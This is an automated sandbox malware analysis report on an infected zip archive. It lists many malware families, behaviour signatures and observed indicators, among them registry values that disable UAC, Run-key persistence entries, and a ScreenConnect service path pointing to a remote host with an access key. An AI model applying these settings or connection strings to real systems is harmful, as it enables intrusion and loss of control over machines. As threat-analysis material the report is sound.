Malware Analysis Report

2025-01-23 12:14

Sample ID 241212-wymq6ssnat
Target 241127-xqsswsslej_pw_infected.zip
SHA256 cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Tags
amadey asyncrat exelastealer lumma phorphiex quasar redline remcos risepro stealc systembc ta505 xmrig xworm zharkbot 1337 default default2 newwwwwwwwwwwwwwwwww remotehost voov3 botnet collection credential_access defense_evasion discovery evasion execution infostealer loader miner persistence privilege_escalation pyinstaller rat spyware stealer themida trojan upx vmprotect worm 44caliber discordrat gurcu rms umbral qqtalk2 voov1 rootkit qqtalk qqtalk1 voov voov2
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Threat Level: Known bad

The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat exelastealer lumma phorphiex quasar redline remcos risepro stealc systembc ta505 xmrig xworm zharkbot 1337 default default2 newwwwwwwwwwwwwwwwww remotehost voov3 botnet collection credential_access defense_evasion discovery evasion execution infostealer loader miner persistence privilege_escalation pyinstaller rat spyware stealer themida trojan upx vmprotect worm 44caliber discordrat gurcu rms umbral qqtalk2 voov1 rootkit qqtalk qqtalk1 voov voov2

Suspicious use of NtCreateProcessExOtherParentProcess

44Caliber family

Umbral

Stealc family

SystemBC

Umbral family

Amadey family

Quasar payload

Gurcu family

Phorphiex family

Lumma family

Risepro family

xmrig

Amadey

Detect Xworm Payload

Xmrig family

Gurcu, WhiteSnake

Discord RAT

RedLine payload

Detect Umbral payload

Redline family

Exelastealer family

Remcos family

AsyncRat

Lumma Stealer, LummaC

Suspicious use of NtCreateUserProcessOtherParentProcess

TA505

Xworm

RMS

Remcos

Ta505 family

44Caliber

Stealc

Zharkbot family

Asyncrat family

Discordrat family

UAC bypass

Xworm family

Quasar family

Quasar RAT

ZharkBot

Systembc family

RisePro

Exela Stealer

RedLine

XMRig Miner payload

Phorphiex, Phorpiex

Rms family

Modifies visiblity of hidden/system files in Explorer

Phorphiex payload

Detects ZharkBot payload

Grants admin privileges

Detected Nirsoft tools

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Async RAT payload

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Creates new service(s)

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Adds policy Run key to start application

Uses browser remote debugging

Downloads MZ/PE file

Drops file in Drivers directory

Drops startup file

Unsecured Credentials: Credentials In Files

Themida packer

Clipboard Data

Identifies Wine through registry keys

Indicator Removal: Clear Windows Event Logs

VMProtect packed file

Event Triggered Execution: Component Object Model Hijacking

Uses the VBS compiler for execution

Loads dropped DLL

Reads data files stored by FTP clients

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Credentials from Password Stores: Windows Credential Manager

Enumerates connected drives

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Checks whether UAC is enabled

Indicator Removal: File Deletion

Looks up external IP address via web service

Power Settings

Drops file in System32 directory

AutoIT Executable

Suspicious use of SetThreadContext

Hide Artifacts: Hidden Files and Directories

UPX packed file

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Boot or Logon Autostart Execution: Authentication Package

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

System Location Discovery: System Language Discovery

Event Triggered Execution: Installer Packages

Program crash

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

System Network Connections Discovery

Permission Groups Discovery: Local Groups

Browser Information Discovery

System Network Configuration Discovery: Internet Connection Discovery

Detects Pyinstaller

Access Token Manipulation: Create Process with Token

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Embeds OpenSSL

NSIS installer

System policy modification

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: GetForegroundWindowSpam

Kills process with taskkill

Runs net.exe

Runs .reg file with regedit

Checks processor information in registry

Script User-Agent

Suspicious use of UnmapMainImage

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

GoLang User-Agent

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Collects information from the system

Gathers network information

Uses Task Scheduler COM API

Modifies registry key

Runs ping.exe

Gathers system information

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Detects videocard installed

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-12 18:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-12 18:19

Reported

2024-12-12 18:40

Platform

win10v2004-20241007-en

Max time kernel

959s

Max time network

1200s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects ZharkBot payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Remcos

rat remcos

Remcos family

remcos

RisePro

stealer risepro

Risepro family

risepro

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

TA505

ta505

Ta505 family

ta505

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

ZharkBot

botnet zharkbot

Zharkbot family

zharkbot

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Google\Chrome\updater.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\tst\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\ProgramData\tst\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (c13606fe9009f11d)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAAAcl7QJx51WIWlm%2f97d68knOHLDmhc8YMk%2bWpKSiakhXgAAAAAOgAAAAAIAACAAAABQXA1RRCIL0SpawatzWi8kVVFrY5j8hGLctHYZFOSln6AEAACLQgNbihyXmbxTioM8KOy3WlcD1ubNH%2bKYLVkdjJpCsLwv1c09knFTKqPX%2bTKT66q%2fkv%2f4mCQq3e1BsOiaqZX6xcUzuAHT34p%2bvGM9Sm%2baiAoR1T84wW4OgKg949Kiq4gADYRGK%2fRa2QNt1%2fjD2UgM6CEoUoFsEnwkZkXXVXtRyNw3nOkXC%2fMclQ1sFX9JaOaD9twuD7lhh2kl4eV7HIj%2fXTVAnXNW1jLdwzJA9kNEVEk2m0pffdIxlgIkXt0Ew86Lq%2f%2bPzf71dMz6te1zFuVJOdFbpOomcgUxOnLGCZaCoyEJ5vn094pYBr7hyfj7zA9eRbiOhYJ%2bHaRXszadpR8ebDP7U3PZFBAr9RROyolueMMnWjL2O6B6%2fb9dqMTjdUYHYtfpBx0fL7AMLuLgAgPVPNA7R3XC3tAuVfHKxahgSmU21p%2bIVp4Wg5lnQFB32KJpLaiBODcfc14tR8ktV6jIt1sb9qlnHVWvq2k62%2frwrp98RKVCoISo9xAbRejo1Z99IcG7aDbXheLWYYWCTtPT0FhHopqowddl8O%2fBlo7E7%2fQJdGTKzmgf8bKhAtt3lL0ReY322bXHJ%2faZVoRe%2f718J9PUB61SO%2fsHS6KpHdmNyZHUA6GWSnKoRYrbZXpEYlexMhzNbp%2f1mLIDfAxgoSg4cOJVh2HXoKSk7c2W6gOoIsFmwv%2bMyX9AT6Zn0M7uYdMi4EemPzsUFSv3woU6Kzovjevy7c0aueREmdCmSIf64gSphEZGLt5gKfVG8nrGDUkW1T6H9VuLAEW%2fGiPWecfPqIFXDdt2TWwsJIw8XujiGu%2blUgitOBO5IwtX2Ygyd6G4q%2fP%2bdvvL4INiPuePVAlKEMsHdBL%2b8P8CQhIO6XZSSpNxydlv78svrwOQCUzXUKPTs2ZHhq%2bYdrVmhoBiX60zLEdxM%2fwoM9cDwn0a4Eelh6abY6EMyxPETEoMXITUZOmon8b8g0J5XwWTyiXeQdlZ%2fG6BnmtQPtLry0qL0tJ13ArQ7UCcYM3gkUgi6fvwQmR7xT9mhagjQANmSSLZAM%2f50laioMrkgXgG%2f994rDbTRey5%2bzAWhACVKAH6sneKqP1TY8SjvkM0Yr6DSpHXbfk7G3doZv3gmqD9Kp%2bl6cBhTdPoa0m5dGu8NWTiZM%2f53Dkl%2brf63PSqNIrYkPAchsi8U7Lm6hItPfjtf8Do0ErwYv8xjb7tYJ9RpoB9omjCG%2bKukWwF88A%2bWe8D2z3x%2bylvcon%2fcMkyoVdPWQPmxJwwu7Mjz2f1qBjV49dZf7qTX%2b9VnGIBmeIFsnSPhyAcDnmqLq1gjhweXDJrkZf8595GNlBm5FM6ph8En8j8oGVMSVKz5BWxmTvLEw3SMZXF1WfblcKcRySi1wEMwsESwPOihGPTGqTK7nlmH6U7NaZYDUNBZvrhceunf%2fqnI36nEM6U4%2fSSTUNswLSACpEiRDS0Y1j8ujBEGhCPvc1lr6%2f6i5ssUzEyuOoE9edLEPbzRP%2fNWc8kFnj%2fmcJ4A8PD%2b0rJ4v6d7vfI6vrL0ROC2sV5SuYPCYS1zdD1pwsxfzlP3ACcksEZhqzocuU%2bG3d4IRjKuUAAAADXZ2g92haPt%2fueSEcAxo%2fN8uUOko0EO9nRiEwmg%2fnDCULWNrQoIiZcn90AD2cGPdcBIuZzzp1QKfge3Z7LQx8h\"" C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1599224382.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\223522870.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\file1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrsYC4kDbQNPAiJow2kT3TU0.bat C:\Users\Admin\AppData\Local\Temp\Files\file1.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\pei.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3188116601.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\223522870.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\543810920.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1657333799.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\864131738.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1487620755.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\install2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\leto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\sam.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\r2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\steel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
